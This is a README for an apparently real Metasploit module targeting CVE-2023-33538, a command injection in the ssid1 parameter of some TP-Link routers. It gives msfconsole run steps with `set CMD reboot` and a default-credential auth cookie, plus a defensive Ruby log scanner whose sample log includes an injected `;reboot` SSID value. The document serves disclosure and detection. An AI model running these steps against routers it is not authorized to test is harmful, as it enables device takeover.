# CVE-2023-33538 – TP-Link TL-WR940N/841N Command Injection (Metasploit module)
This Metasploit **auxiliary module** targets an authenticated **command injection vulnerability** in TP-Link TL-WR940N V2/V4 and TL-WR841N V8/V10 routers.
The flaw is in the `ssid1` parameter handled by `WlanNetworkRpm.htm`, which allows injection of arbitrary shell commands.
When exploitation succeeds, the attacker can execute arbitrary commands on the device.
More information about the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
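
For defenders, an added example (not part of this module or its repository): a Ruby script that scans HTTP access logs for requests to `WlanNetworkRpm.htm` whose `ssid1` value contains shell metacharacters or exceeds the 32-byte SSID limit. The combined-log format, the sample lines (including the `userRpm` path segment and client addresses) and the function names are assumptions constructed for illustration, and it assumes a proxy or sensor in front of the router's web interface records request lines.

```ruby
require 'uri'

SHELL_META     = /[;|&`$<>(){}\\\r\n]/  # characters a shell treats specially
MAX_SSID_BYTES = 32                     # 802.11 caps an SSID at 32 octets
REQUEST_LINE   = %r{"(?:GET|POST) (\S+) HTTP/\d\.\d"}

# Constructed sample log (assumed combined format from a proxy or sensor).
SAMPLE_LOG = <<~LOG
  192.168.0.50 - - [01/Jan/2025:10:00:00 +0000] "GET /ABCD1234/userRpm/WlanNetworkRpm.htm?ssid1=HomeNet HTTP/1.1" 200 512
  192.168.0.77 - - [01/Jan/2025:10:05:00 +0000] "GET /ABCD1234/userRpm/WlanNetworkRpm.htm?ssid1=HomeNet%3Breboot HTTP/1.1" 200 512
  192.168.0.77 - - [01/Jan/2025:10:06:00 +0000] "GET /ABCD1234/userRpm/WlanNetworkRpm.htm?ssid1=#{'A' * 40} HTTP/1.1" 200 512
  192.168.0.50 - - [01/Jan/2025:10:07:00 +0000] "GET /ABCD1234/userRpm/Index.htm HTTP/1.1" 200 900
LOG

# Reasons a request target looks like ssid1 tampering; [] if nothing stands out.
def ssid1_findings(target)
  path, query = target.split('?', 2)
  return [] unless query && path.end_with?('/WlanNetworkRpm.htm')

  # Decode first so percent-encoded metacharacters (%3B, %60, ...) are seen.
  URI.decode_www_form(query).select { |k, _| k == 'ssid1' }.flat_map do |_, v|
    reasons = []
    reasons << 'shell metacharacter in ssid1' if v.match?(SHELL_META)
    reasons << "ssid1 longer than #{MAX_SSID_BYTES} bytes" if v.bytesize > MAX_SSID_BYTES
    reasons
  end
rescue ArgumentError
  # decode_www_form rejects non-ASCII raw queries; treat that as suspicious too.
  ['ssid1 query is not valid form encoding']
end

# Returns [[line_number, client_ip, reasons], ...] for suspicious log lines.
def scan_log(text)
  text.each_line.with_index(1).filter_map do |line, n|
    m = REQUEST_LINE.match(line) or next
    reasons = ssid1_findings(m[1])
    [n, line[/\A\S+/], reasons] unless reasons.empty?
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |n, ip, why| puts "line #{n} from #{ip}: #{why.join(', ')}" }
end
```

Only query-string parameters are inspected; a sensor that also captures request bodies would need the same check applied there.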
---
## How to run this module?
1. Copy the `.rb` file into your Metasploit modules folder, for example:
```bash
cp tplink_ssid1_rce.rb /usr/share/metasploit-framework/modules/auxiliary/admin/http/
```
2. Start Metasploit console:
```bash
msfconsole
```
3. Search and use the module:
```bash
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
```
4. Set required options:
```
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
```
> The module **does not** perform authentication. You must manually extract the `Authorization` cookie and session prefix from a successful login to the router's web interface.
---
## References
- https://nvd.nist.gov/vuln/detail/CVE-2023-33538
- https://web.archive.org/web/20230609111043/https://github.com/a101e-IoTvul/iotvul/blob/main/tp-link/3/TL-WR940N_TL-WR841N_userRpm_WlanNetworkRpm_Command_Injection.md
---
## Disclaimer
This module is intended **for educational purposes only**.
**Do not use this code against devices or infrastructure you do not own or have explicit permission to test.**
---
## Issues
If you find bugs, or have ideas for improvements – feel free to open an issue or leave a comment.